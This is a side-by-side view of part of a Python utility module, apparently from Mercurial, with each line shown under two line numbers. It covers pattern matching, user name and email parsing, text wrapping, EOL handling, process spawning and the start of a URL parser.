2588
2596
2589 force exact matches ('literal:' prefix)
2597 force exact matches ('literal:' prefix)
2590 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2598 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2591 ('literal', 're:foobar', [False, True])
2599 ('literal', 're:foobar', [False, True])
2592
2600
2593 unknown prefixes are ignored and treated as literals
2601 unknown prefixes are ignored and treated as literals
2594 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2602 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2595 ('literal', 'foo:bar', [False, False, True])
2603 ('literal', 'foo:bar', [False, False, True])
2596
2604
2597 case insensitive regex matches
2605 case insensitive regex matches
2598 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2606 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2599 ('re', 'A.+b', [False, False, True])
2607 ('re', 'A.+b', [False, False, True])
2600
2608
2601 case insensitive literal matches
2609 case insensitive literal matches
2602 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2610 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2603 ('literal', 'ABCDEFG', [False, False, True])
2611 ('literal', 'ABCDEFG', [False, False, True])
2604 """
2612 """
2605 if pattern.startswith('re:'):
2613 if pattern.startswith('re:'):
2606 pattern = pattern[3:]
2614 pattern = pattern[3:]
2607 try:
2615 try:
2608 flags = 0
2616 flags = 0
2609 if not casesensitive:
2617 if not casesensitive:
2610 flags = remod.I
2618 flags = remod.I
2611 regex = remod.compile(pattern, flags)
2619 regex = remod.compile(pattern, flags)
2612 except remod.error as e:
2620 except remod.error as e:
2613 raise error.ParseError(_('invalid regular expression: %s')
2621 raise error.ParseError(_('invalid regular expression: %s')
2614 % e)
2622 % e)
2615 return 're', pattern, regex.search
2623 return 're', pattern, regex.search
2616 elif pattern.startswith('literal:'):
2624 elif pattern.startswith('literal:'):
2617 pattern = pattern[8:]
2625 pattern = pattern[8:]
2618
2626
2619 match = pattern.__eq__
2627 match = pattern.__eq__
2620
2628
2621 if not casesensitive:
2629 if not casesensitive:
2622 ipat = encoding.lower(pattern)
2630 ipat = encoding.lower(pattern)
2623 match = lambda s: ipat == encoding.lower(s)
2631 match = lambda s: ipat == encoding.lower(s)
2624 return 'literal', pattern, match
2632 return 'literal', pattern, match
2625
2633
2626 def shortuser(user):
2634 def shortuser(user):
2627 """Return a short representation of a user name or email address."""
2635 """Return a short representation of a user name or email address."""
2628 f = user.find('@')
2636 f = user.find('@')
2629 if f >= 0:
2637 if f >= 0:
2630 user = user[:f]
2638 user = user[:f]
2631 f = user.find('<')
2639 f = user.find('<')
2632 if f >= 0:
2640 if f >= 0:
2633 user = user[f + 1:]
2641 user = user[f + 1:]
2634 f = user.find(' ')
2642 f = user.find(' ')
2635 if f >= 0:
2643 if f >= 0:
2636 user = user[:f]
2644 user = user[:f]
2637 f = user.find('.')
2645 f = user.find('.')
2638 if f >= 0:
2646 if f >= 0:
2639 user = user[:f]
2647 user = user[:f]
2640 return user
2648 return user
2641
2649
2642 def emailuser(user):
2650 def emailuser(user):
2643 """Return the user portion of an email address."""
2651 """Return the user portion of an email address."""
2644 f = user.find('@')
2652 f = user.find('@')
2645 if f >= 0:
2653 if f >= 0:
2646 user = user[:f]
2654 user = user[:f]
2647 f = user.find('<')
2655 f = user.find('<')
2648 if f >= 0:
2656 if f >= 0:
2649 user = user[f + 1:]
2657 user = user[f + 1:]
2650 return user
2658 return user
2651
2659
2652 def email(author):
2660 def email(author):
2653 '''get email of author.'''
2661 '''get email of author.'''
2654 r = author.find('>')
2662 r = author.find('>')
2655 if r == -1:
2663 if r == -1:
2656 r = None
2664 r = None
2657 return author[author.find('<') + 1:r]
2665 return author[author.find('<') + 1:r]
2658
2666
2659 def ellipsis(text, maxlength=400):
2667 def ellipsis(text, maxlength=400):
2660 """Trim string to at most maxlength (default: 400) columns in display."""
2668 """Trim string to at most maxlength (default: 400) columns in display."""
2661 return encoding.trim(text, maxlength, ellipsis='...')
2669 return encoding.trim(text, maxlength, ellipsis='...')
2662
2670
2663 def unitcountfn(*unittable):
2671 def unitcountfn(*unittable):
2664 '''return a function that renders a readable count of some quantity'''
2672 '''return a function that renders a readable count of some quantity'''
2665
2673
2666 def go(count):
2674 def go(count):
2667 for multiplier, divisor, format in unittable:
2675 for multiplier, divisor, format in unittable:
2668 if abs(count) >= divisor * multiplier:
2676 if abs(count) >= divisor * multiplier:
2669 return format % (count / float(divisor))
2677 return format % (count / float(divisor))
2670 return unittable[-1][2] % count
2678 return unittable[-1][2] % count
2671
2679
2672 return go
2680 return go
2673
2681
2674 def processlinerange(fromline, toline):
2682 def processlinerange(fromline, toline):
2675 """Check that linerange <fromline>:<toline> makes sense and return a
2683 """Check that linerange <fromline>:<toline> makes sense and return a
2676 0-based range.
2684 0-based range.
2677
2685
2678 >>> processlinerange(10, 20)
2686 >>> processlinerange(10, 20)
2679 (9, 20)
2687 (9, 20)
2680 >>> processlinerange(2, 1)
2688 >>> processlinerange(2, 1)
2681 Traceback (most recent call last):
2689 Traceback (most recent call last):
2682 ...
2690 ...
2683 ParseError: line range must be positive
2691 ParseError: line range must be positive
2684 >>> processlinerange(0, 5)
2692 >>> processlinerange(0, 5)
2685 Traceback (most recent call last):
2693 Traceback (most recent call last):
2686 ...
2694 ...
2687 ParseError: fromline must be strictly positive
2695 ParseError: fromline must be strictly positive
2688 """
2696 """
2689 if toline - fromline < 0:
2697 if toline - fromline < 0:
2690 raise error.ParseError(_("line range must be positive"))
2698 raise error.ParseError(_("line range must be positive"))
2691 if fromline < 1:
2699 if fromline < 1:
2692 raise error.ParseError(_("fromline must be strictly positive"))
2700 raise error.ParseError(_("fromline must be strictly positive"))
2693 return fromline - 1, toline
2701 return fromline - 1, toline
2694
2702
2695 bytecount = unitcountfn(
2703 bytecount = unitcountfn(
2696 (100, 1 << 30, _('%.0f GB')),
2704 (100, 1 << 30, _('%.0f GB')),
2697 (10, 1 << 30, _('%.1f GB')),
2705 (10, 1 << 30, _('%.1f GB')),
2698 (1, 1 << 30, _('%.2f GB')),
2706 (1, 1 << 30, _('%.2f GB')),
2699 (100, 1 << 20, _('%.0f MB')),
2707 (100, 1 << 20, _('%.0f MB')),
2700 (10, 1 << 20, _('%.1f MB')),
2708 (10, 1 << 20, _('%.1f MB')),
2701 (1, 1 << 20, _('%.2f MB')),
2709 (1, 1 << 20, _('%.2f MB')),
2702 (100, 1 << 10, _('%.0f KB')),
2710 (100, 1 << 10, _('%.0f KB')),
2703 (10, 1 << 10, _('%.1f KB')),
2711 (10, 1 << 10, _('%.1f KB')),
2704 (1, 1 << 10, _('%.2f KB')),
2712 (1, 1 << 10, _('%.2f KB')),
2705 (1, 1, _('%.0f bytes')),
2713 (1, 1, _('%.0f bytes')),
2706 )
2714 )
2707
2715
2708 class transformingwriter(object):
2716 class transformingwriter(object):
2709 """Writable file wrapper to transform data by function"""
2717 """Writable file wrapper to transform data by function"""
2710
2718
2711 def __init__(self, fp, encode):
2719 def __init__(self, fp, encode):
2712 self._fp = fp
2720 self._fp = fp
2713 self._encode = encode
2721 self._encode = encode
2714
2722
2715 def close(self):
2723 def close(self):
2716 self._fp.close()
2724 self._fp.close()
2717
2725
2718 def flush(self):
2726 def flush(self):
2719 self._fp.flush()
2727 self._fp.flush()
2720
2728
2721 def write(self, data):
2729 def write(self, data):
2722 return self._fp.write(self._encode(data))
2730 return self._fp.write(self._encode(data))
2723
2731
2724 # Matches a single EOL which can either be a CRLF where repeated CR
2732 # Matches a single EOL which can either be a CRLF where repeated CR
2725 # are removed or a LF. We do not care about old Macintosh files, so a
2733 # are removed or a LF. We do not care about old Macintosh files, so a
2726 # stray CR is an error.
2734 # stray CR is an error.
2727 _eolre = remod.compile(br'\r*\n')
2735 _eolre = remod.compile(br'\r*\n')
2728
2736
2729 def tolf(s):
2737 def tolf(s):
2730 return _eolre.sub('\n', s)
2738 return _eolre.sub('\n', s)
2731
2739
2732 def tocrlf(s):
2740 def tocrlf(s):
2733 return _eolre.sub('\r\n', s)
2741 return _eolre.sub('\r\n', s)
2734
2742
2735 def _crlfwriter(fp):
2743 def _crlfwriter(fp):
2736 return transformingwriter(fp, tocrlf)
2744 return transformingwriter(fp, tocrlf)
2737
2745
2738 if pycompat.oslinesep == '\r\n':
2746 if pycompat.oslinesep == '\r\n':
2739 tonativeeol = tocrlf
2747 tonativeeol = tocrlf
2740 fromnativeeol = tolf
2748 fromnativeeol = tolf
2741 nativeeolwriter = _crlfwriter
2749 nativeeolwriter = _crlfwriter
2742 else:
2750 else:
2743 tonativeeol = pycompat.identity
2751 tonativeeol = pycompat.identity
2744 fromnativeeol = pycompat.identity
2752 fromnativeeol = pycompat.identity
2745 nativeeolwriter = pycompat.identity
2753 nativeeolwriter = pycompat.identity
2746
2754
2747 def escapestr(s):
2755 def escapestr(s):
2748 # call underlying function of s.encode('string_escape') directly for
2756 # call underlying function of s.encode('string_escape') directly for
2749 # Python 3 compatibility
2757 # Python 3 compatibility
2750 return codecs.escape_encode(s)[0]
2758 return codecs.escape_encode(s)[0]
2751
2759
2752 def unescapestr(s):
2760 def unescapestr(s):
2753 return codecs.escape_decode(s)[0]
2761 return codecs.escape_decode(s)[0]
2754
2762
2755 def forcebytestr(obj):
2763 def forcebytestr(obj):
2756 """Portably format an arbitrary object (e.g. exception) into a byte
2764 """Portably format an arbitrary object (e.g. exception) into a byte
2757 string."""
2765 string."""
2758 try:
2766 try:
2759 return pycompat.bytestr(obj)
2767 return pycompat.bytestr(obj)
2760 except UnicodeEncodeError:
2768 except UnicodeEncodeError:
2761 # non-ascii string, may be lossy
2769 # non-ascii string, may be lossy
2762 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2770 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2763
2771
2764 def uirepr(s):
2772 def uirepr(s):
2765 # Avoid double backslash in Windows path repr()
2773 # Avoid double backslash in Windows path repr()
2766 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2774 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2767
2775
2768 # delay import of textwrap
2776 # delay import of textwrap
2769 def MBTextWrapper(**kwargs):
2777 def MBTextWrapper(**kwargs):
2770 class tw(textwrap.TextWrapper):
2778 class tw(textwrap.TextWrapper):
2771 """
2779 """
2772 Extend TextWrapper for width-awareness.
2780 Extend TextWrapper for width-awareness.
2773
2781
2774 Neither number of 'bytes' in any encoding nor 'characters' is
2782 Neither number of 'bytes' in any encoding nor 'characters' is
2775 appropriate to calculate terminal columns for specified string.
2783 appropriate to calculate terminal columns for specified string.
2776
2784
2777 Original TextWrapper implementation uses built-in 'len()' directly,
2785 Original TextWrapper implementation uses built-in 'len()' directly,
2778 so overriding is needed to use width information of each characters.
2786 so overriding is needed to use width information of each characters.
2779
2787
2780 In addition, characters classified into 'ambiguous' width are
2788 In addition, characters classified into 'ambiguous' width are
2781 treated as wide in East Asian area, but as narrow in other.
2789 treated as wide in East Asian area, but as narrow in other.
2782
2790
2783 This requires use decision to determine width of such characters.
2791 This requires use decision to determine width of such characters.
2784 """
2792 """
2785 def _cutdown(self, ucstr, space_left):
2793 def _cutdown(self, ucstr, space_left):
2786 l = 0
2794 l = 0
2787 colwidth = encoding.ucolwidth
2795 colwidth = encoding.ucolwidth
2788 for i in xrange(len(ucstr)):
2796 for i in xrange(len(ucstr)):
2789 l += colwidth(ucstr[i])
2797 l += colwidth(ucstr[i])
2790 if space_left < l:
2798 if space_left < l:
2791 return (ucstr[:i], ucstr[i:])
2799 return (ucstr[:i], ucstr[i:])
2792 return ucstr, ''
2800 return ucstr, ''
2793
2801
2794 # overriding of base class
2802 # overriding of base class
2795 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2803 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2796 space_left = max(width - cur_len, 1)
2804 space_left = max(width - cur_len, 1)
2797
2805
2798 if self.break_long_words:
2806 if self.break_long_words:
2799 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2807 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2800 cur_line.append(cut)
2808 cur_line.append(cut)
2801 reversed_chunks[-1] = res
2809 reversed_chunks[-1] = res
2802 elif not cur_line:
2810 elif not cur_line:
2803 cur_line.append(reversed_chunks.pop())
2811 cur_line.append(reversed_chunks.pop())
2804
2812
2805 # this overriding code is imported from TextWrapper of Python 2.6
2813 # this overriding code is imported from TextWrapper of Python 2.6
2806 # to calculate columns of string by 'encoding.ucolwidth()'
2814 # to calculate columns of string by 'encoding.ucolwidth()'
2807 def _wrap_chunks(self, chunks):
2815 def _wrap_chunks(self, chunks):
2808 colwidth = encoding.ucolwidth
2816 colwidth = encoding.ucolwidth
2809
2817
2810 lines = []
2818 lines = []
2811 if self.width <= 0:
2819 if self.width <= 0:
2812 raise ValueError("invalid width %r (must be > 0)" % self.width)
2820 raise ValueError("invalid width %r (must be > 0)" % self.width)
2813
2821
2814 # Arrange in reverse order so items can be efficiently popped
2822 # Arrange in reverse order so items can be efficiently popped
2815 # from a stack of chucks.
2823 # from a stack of chucks.
2816 chunks.reverse()
2824 chunks.reverse()
2817
2825
2818 while chunks:
2826 while chunks:
2819
2827
2820 # Start the list of chunks that will make up the current line.
2828 # Start the list of chunks that will make up the current line.
2821 # cur_len is just the length of all the chunks in cur_line.
2829 # cur_len is just the length of all the chunks in cur_line.
2822 cur_line = []
2830 cur_line = []
2823 cur_len = 0
2831 cur_len = 0
2824
2832
2825 # Figure out which static string will prefix this line.
2833 # Figure out which static string will prefix this line.
2826 if lines:
2834 if lines:
2827 indent = self.subsequent_indent
2835 indent = self.subsequent_indent
2828 else:
2836 else:
2829 indent = self.initial_indent
2837 indent = self.initial_indent
2830
2838
2831 # Maximum width for this line.
2839 # Maximum width for this line.
2832 width = self.width - len(indent)
2840 width = self.width - len(indent)
2833
2841
2834 # First chunk on line is whitespace -- drop it, unless this
2842 # First chunk on line is whitespace -- drop it, unless this
2835 # is the very beginning of the text (i.e. no lines started yet).
2843 # is the very beginning of the text (i.e. no lines started yet).
2836 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2844 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2837 del chunks[-1]
2845 del chunks[-1]
2838
2846
2839 while chunks:
2847 while chunks:
2840 l = colwidth(chunks[-1])
2848 l = colwidth(chunks[-1])
2841
2849
2842 # Can at least squeeze this chunk onto the current line.
2850 # Can at least squeeze this chunk onto the current line.
2843 if cur_len + l <= width:
2851 if cur_len + l <= width:
2844 cur_line.append(chunks.pop())
2852 cur_line.append(chunks.pop())
2845 cur_len += l
2853 cur_len += l
2846
2854
2847 # Nope, this line is full.
2855 # Nope, this line is full.
2848 else:
2856 else:
2849 break
2857 break
2850
2858
2851 # The current line is full, and the next chunk is too big to
2859 # The current line is full, and the next chunk is too big to
2852 # fit on *any* line (not just this one).
2860 # fit on *any* line (not just this one).
2853 if chunks and colwidth(chunks[-1]) > width:
2861 if chunks and colwidth(chunks[-1]) > width:
2854 self._handle_long_word(chunks, cur_line, cur_len, width)
2862 self._handle_long_word(chunks, cur_line, cur_len, width)
2855
2863
2856 # If the last chunk on this line is all whitespace, drop it.
2864 # If the last chunk on this line is all whitespace, drop it.
2857 if (self.drop_whitespace and
2865 if (self.drop_whitespace and
2858 cur_line and cur_line[-1].strip() == r''):
2866 cur_line and cur_line[-1].strip() == r''):
2859 del cur_line[-1]
2867 del cur_line[-1]
2860
2868
2861 # Convert current line back to a string and store it in list
2869 # Convert current line back to a string and store it in list
2862 # of all lines (return value).
2870 # of all lines (return value).
2863 if cur_line:
2871 if cur_line:
2864 lines.append(indent + r''.join(cur_line))
2872 lines.append(indent + r''.join(cur_line))
2865
2873
2866 return lines
2874 return lines
2867
2875
2868 global MBTextWrapper
2876 global MBTextWrapper
2869 MBTextWrapper = tw
2877 MBTextWrapper = tw
2870 return tw(**kwargs)
2878 return tw(**kwargs)
2871
2879
2872 def wrap(line, width, initindent='', hangindent=''):
2880 def wrap(line, width, initindent='', hangindent=''):
2873 maxindent = max(len(hangindent), len(initindent))
2881 maxindent = max(len(hangindent), len(initindent))
2874 if width <= maxindent:
2882 if width <= maxindent:
2875 # adjust for weird terminal size
2883 # adjust for weird terminal size
2876 width = max(78, maxindent + 1)
2884 width = max(78, maxindent + 1)
2877 line = line.decode(pycompat.sysstr(encoding.encoding),
2885 line = line.decode(pycompat.sysstr(encoding.encoding),
2878 pycompat.sysstr(encoding.encodingmode))
2886 pycompat.sysstr(encoding.encodingmode))
2879 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2887 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2880 pycompat.sysstr(encoding.encodingmode))
2888 pycompat.sysstr(encoding.encodingmode))
2881 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2889 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2882 pycompat.sysstr(encoding.encodingmode))
2890 pycompat.sysstr(encoding.encodingmode))
2883 wrapper = MBTextWrapper(width=width,
2891 wrapper = MBTextWrapper(width=width,
2884 initial_indent=initindent,
2892 initial_indent=initindent,
2885 subsequent_indent=hangindent)
2893 subsequent_indent=hangindent)
2886 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2894 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2887
2895
2888 if (pyplatform.python_implementation() == 'CPython' and
2896 if (pyplatform.python_implementation() == 'CPython' and
2889 sys.version_info < (3, 0)):
2897 sys.version_info < (3, 0)):
2890 # There is an issue in CPython that some IO methods do not handle EINTR
2898 # There is an issue in CPython that some IO methods do not handle EINTR
2891 # correctly. The following table shows what CPython version (and functions)
2899 # correctly. The following table shows what CPython version (and functions)
2892 # are affected (buggy: has the EINTR bug, okay: otherwise):
2900 # are affected (buggy: has the EINTR bug, okay: otherwise):
2893 #
2901 #
2894 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2902 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2895 # --------------------------------------------------
2903 # --------------------------------------------------
2896 # fp.__iter__ | buggy | buggy | okay
2904 # fp.__iter__ | buggy | buggy | okay
2897 # fp.read* | buggy | okay [1] | okay
2905 # fp.read* | buggy | okay [1] | okay
2898 #
2906 #
2899 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2907 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2900 #
2908 #
2901 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2909 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2902 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2910 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2903 #
2911 #
2904 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2912 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2905 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2913 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2906 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2914 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2907 # fp.__iter__ but not other fp.read* methods.
2915 # fp.__iter__ but not other fp.read* methods.
2908 #
2916 #
2909 # On modern systems like Linux, the "read" syscall cannot be interrupted
2917 # On modern systems like Linux, the "read" syscall cannot be interrupted
2910 # when reading "fast" files like on-disk files. So the EINTR issue only
2918 # when reading "fast" files like on-disk files. So the EINTR issue only
2911 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2919 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2912 # files approximately as "fast" files and use the fast (unsafe) code path,
2920 # files approximately as "fast" files and use the fast (unsafe) code path,
2913 # to minimize the performance impact.
2921 # to minimize the performance impact.
2914 if sys.version_info >= (2, 7, 4):
2922 if sys.version_info >= (2, 7, 4):
2915 # fp.readline deals with EINTR correctly, use it as a workaround.
2923 # fp.readline deals with EINTR correctly, use it as a workaround.
2916 def _safeiterfile(fp):
2924 def _safeiterfile(fp):
2917 return iter(fp.readline, '')
2925 return iter(fp.readline, '')
2918 else:
2926 else:
2919 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2927 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2920 # note: this may block longer than necessary because of bufsize.
2928 # note: this may block longer than necessary because of bufsize.
2921 def _safeiterfile(fp, bufsize=4096):
2929 def _safeiterfile(fp, bufsize=4096):
2922 fd = fp.fileno()
2930 fd = fp.fileno()
2923 line = ''
2931 line = ''
2924 while True:
2932 while True:
2925 try:
2933 try:
2926 buf = os.read(fd, bufsize)
2934 buf = os.read(fd, bufsize)
2927 except OSError as ex:
2935 except OSError as ex:
2928 # os.read only raises EINTR before any data is read
2936 # os.read only raises EINTR before any data is read
2929 if ex.errno == errno.EINTR:
2937 if ex.errno == errno.EINTR:
2930 continue
2938 continue
2931 else:
2939 else:
2932 raise
2940 raise
2933 line += buf
2941 line += buf
2934 if '\n' in buf:
2942 if '\n' in buf:
2935 splitted = line.splitlines(True)
2943 splitted = line.splitlines(True)
2936 line = ''
2944 line = ''
2937 for l in splitted:
2945 for l in splitted:
2938 if l[-1] == '\n':
2946 if l[-1] == '\n':
2939 yield l
2947 yield l
2940 else:
2948 else:
2941 line = l
2949 line = l
2942 if not buf:
2950 if not buf:
2943 break
2951 break
2944 if line:
2952 if line:
2945 yield line
2953 yield line
2946
2954
2947 def iterfile(fp):
2955 def iterfile(fp):
2948 fastpath = True
2956 fastpath = True
2949 if type(fp) is file:
2957 if type(fp) is file:
2950 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2958 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2951 if fastpath:
2959 if fastpath:
2952 return fp
2960 return fp
2953 else:
2961 else:
2954 return _safeiterfile(fp)
2962 return _safeiterfile(fp)
2955 else:
2963 else:
2956 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2964 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2957 def iterfile(fp):
2965 def iterfile(fp):
2958 return fp
2966 return fp
2959
2967
2960 def iterlines(iterator):
2968 def iterlines(iterator):
2961 for chunk in iterator:
2969 for chunk in iterator:
2962 for line in chunk.splitlines():
2970 for line in chunk.splitlines():
2963 yield line
2971 yield line
2964
2972
2965 def expandpath(path):
2973 def expandpath(path):
2966 return os.path.expanduser(os.path.expandvars(path))
2974 return os.path.expanduser(os.path.expandvars(path))
2967
2975
2968 def hgcmd():
2976 def hgcmd():
2969 """Return the command used to execute current hg
2977 """Return the command used to execute current hg
2970
2978
2971 This is different from hgexecutable() because on Windows we want
2979 This is different from hgexecutable() because on Windows we want
2972 to avoid things opening new shell windows like batch files, so we
2980 to avoid things opening new shell windows like batch files, so we
2973 get either the python call or current executable.
2981 get either the python call or current executable.
2974 """
2982 """
2975 if mainfrozen():
2983 if mainfrozen():
2976 if getattr(sys, 'frozen', None) == 'macosx_app':
2984 if getattr(sys, 'frozen', None) == 'macosx_app':
2977 # Env variable set by py2app
2985 # Env variable set by py2app
2978 return [encoding.environ['EXECUTABLEPATH']]
2986 return [encoding.environ['EXECUTABLEPATH']]
2979 else:
2987 else:
2980 return [pycompat.sysexecutable]
2988 return [pycompat.sysexecutable]
2981 return gethgcmd()
2989 return gethgcmd()
2982
2990
2983 def rundetached(args, condfn):
2991 def rundetached(args, condfn):
2984 """Execute the argument list in a detached process.
2992 """Execute the argument list in a detached process.
2985
2993
2986 condfn is a callable which is called repeatedly and should return
2994 condfn is a callable which is called repeatedly and should return
2987 True once the child process is known to have started successfully.
2995 True once the child process is known to have started successfully.
2988 At this point, the child process PID is returned. If the child
2996 At this point, the child process PID is returned. If the child
2989 process fails to start or finishes before condfn() evaluates to
2997 process fails to start or finishes before condfn() evaluates to
2990 True, return -1.
2998 True, return -1.
2991 """
2999 """
2992 # Windows case is easier because the child process is either
3000 # Windows case is easier because the child process is either
2993 # successfully starting and validating the condition or exiting
3001 # successfully starting and validating the condition or exiting
2994 # on failure. We just poll on its PID. On Unix, if the child
3002 # on failure. We just poll on its PID. On Unix, if the child
2995 # process fails to start, it will be left in a zombie state until
3003 # process fails to start, it will be left in a zombie state until
2996 # the parent wait on it, which we cannot do since we expect a long
3004 # the parent wait on it, which we cannot do since we expect a long
2997 # running process on success. Instead we listen for SIGCHLD telling
3005 # running process on success. Instead we listen for SIGCHLD telling
2998 # us our child process terminated.
3006 # us our child process terminated.
2999 terminated = set()
3007 terminated = set()
3000 def handler(signum, frame):
3008 def handler(signum, frame):
3001 terminated.add(os.wait())
3009 terminated.add(os.wait())
3002 prevhandler = None
3010 prevhandler = None
3003 SIGCHLD = getattr(signal, 'SIGCHLD', None)
3011 SIGCHLD = getattr(signal, 'SIGCHLD', None)
3004 if SIGCHLD is not None:
3012 if SIGCHLD is not None:
3005 prevhandler = signal.signal(SIGCHLD, handler)
3013 prevhandler = signal.signal(SIGCHLD, handler)
3006 try:
3014 try:
3007 pid = spawndetached(args)
3015 pid = spawndetached(args)
3008 while not condfn():
3016 while not condfn():
3009 if ((pid in terminated or not testpid(pid))
3017 if ((pid in terminated or not testpid(pid))
3010 and not condfn()):
3018 and not condfn()):
3011 return -1
3019 return -1
3012 time.sleep(0.1)
3020 time.sleep(0.1)
3013 return pid
3021 return pid
3014 finally:
3022 finally:
3015 if prevhandler is not None:
3023 if prevhandler is not None:
3016 signal.signal(signal.SIGCHLD, prevhandler)
3024 signal.signal(signal.SIGCHLD, prevhandler)
3017
3025
3018 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3026 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3019 """Return the result of interpolating items in the mapping into string s.
3027 """Return the result of interpolating items in the mapping into string s.
3020
3028
3021 prefix is a single character string, or a two character string with
3029 prefix is a single character string, or a two character string with
3022 a backslash as the first character if the prefix needs to be escaped in
3030 a backslash as the first character if the prefix needs to be escaped in
3023 a regular expression.
3031 a regular expression.
3024
3032
3025 fn is an optional function that will be applied to the replacement text
3033 fn is an optional function that will be applied to the replacement text
3026 just before replacement.
3034 just before replacement.
3027
3035
3028 escape_prefix is an optional flag that allows using doubled prefix for
3036 escape_prefix is an optional flag that allows using doubled prefix for
3029 its escaping.
3037 its escaping.
3030 """
3038 """
3031 fn = fn or (lambda s: s)
3039 fn = fn or (lambda s: s)
3032 patterns = '|'.join(mapping.keys())
3040 patterns = '|'.join(mapping.keys())
3033 if escape_prefix:
3041 if escape_prefix:
3034 patterns += '|' + prefix
3042 patterns += '|' + prefix
3035 if len(prefix) > 1:
3043 if len(prefix) > 1:
3036 prefix_char = prefix[1:]
3044 prefix_char = prefix[1:]
3037 else:
3045 else:
3038 prefix_char = prefix
3046 prefix_char = prefix
3039 mapping[prefix_char] = prefix_char
3047 mapping[prefix_char] = prefix_char
3040 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3048 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3041 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3049 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3042
3050
3043 def getport(port):
3051 def getport(port):
3044 """Return the port for a given network service.
3052 """Return the port for a given network service.
3045
3053
3046 If port is an integer, it's returned as is. If it's a string, it's
3054 If port is an integer, it's returned as is. If it's a string, it's
3047 looked up using socket.getservbyname(). If there's no matching
3055 looked up using socket.getservbyname(). If there's no matching
3048 service, error.Abort is raised.
3056 service, error.Abort is raised.
3049 """
3057 """
3050 try:
3058 try:
3051 return int(port)
3059 return int(port)
3052 except ValueError:
3060 except ValueError:
3053 pass
3061 pass
3054
3062
3055 try:
3063 try:
3056 return socket.getservbyname(pycompat.sysstr(port))
3064 return socket.getservbyname(pycompat.sysstr(port))
3057 except socket.error:
3065 except socket.error:
3058 raise Abort(_("no port number associated with service '%s'") % port)
3066 raise Abort(_("no port number associated with service '%s'") % port)
3059
3067
3060 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3068 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3061 '0': False, 'no': False, 'false': False, 'off': False,
3069 '0': False, 'no': False, 'false': False, 'off': False,
3062 'never': False}
3070 'never': False}
3063
3071
3064 def parsebool(s):
3072 def parsebool(s):
3065 """Parse s into a boolean.
3073 """Parse s into a boolean.
3066
3074
3067 If s is not a valid boolean, returns None.
3075 If s is not a valid boolean, returns None.
3068 """
3076 """
3069 return _booleans.get(s.lower(), None)
3077 return _booleans.get(s.lower(), None)
3070
3078
3071 _hextochr = dict((a + b, chr(int(a + b, 16)))
3079 _hextochr = dict((a + b, chr(int(a + b, 16)))
3072 for a in string.hexdigits for b in string.hexdigits)
3080 for a in string.hexdigits for b in string.hexdigits)
3073
3081
3074 class url(object):
3082 class url(object):
3075 r"""Reliable URL parser.
3083 r"""Reliable URL parser.
3076
3084
3077 This parses URLs and provides attributes for the following
3085 This parses URLs and provides attributes for the following
3078 components:
3086 components:
3079
3087
3080 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3088 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3081
3089
3082 Missing components are set to None. The only exception is
3090 Missing components are set to None. The only exception is
3083 fragment, which is set to '' if present but empty.
3091 fragment, which is set to '' if present but empty.
3084
3092
3085 If parsefragment is False, fragment is included in query. If
3093 If parsefragment is False, fragment is included in query. If
3086 parsequery is False, query is included in path. If both are
3094 parsequery is False, query is included in path. If both are
3087 False, both fragment and query are included in path.
3095 False, both fragment and query are included in path.
3088
3096
